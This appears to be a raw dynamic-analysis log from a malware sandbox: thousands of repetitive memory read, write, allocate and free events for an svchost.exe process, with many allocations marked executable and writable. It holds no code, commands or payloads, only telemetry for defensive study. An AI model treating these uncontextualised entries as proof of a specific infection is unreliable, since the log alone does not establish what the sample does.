Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20019, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019278, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 15	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2001f, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019280, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 7	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20017, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019288, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cd38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624776	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 25	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18c948, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624312	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18c9a8, free_type = MEM_RELEASE, size = 1624472	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20029, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cad8, free_type = MEM_RELEASE, size = 1624784	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 25	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20029, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019010, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 23	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20027, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019018, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 17	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20021, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019020, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 10	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2001a, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019028, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 18	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20022, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019030, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 18	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20022, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019038, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 17	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20021, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019040, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 24	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20028, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019048, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 20	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20024, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019050, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 19	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20023, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019058, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 13	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2001d, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019060, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 24	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20028, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019068, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 17	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20021, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019070, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 28	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2002c, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019078, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20020, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019080, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 17	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20021, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019088, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 9	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20019, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019090, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 13	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2001d, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019098, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 15	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2001f, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400190a0, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 13	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2001d, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400190a8, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 13	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2001d, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400190b0, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 6	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
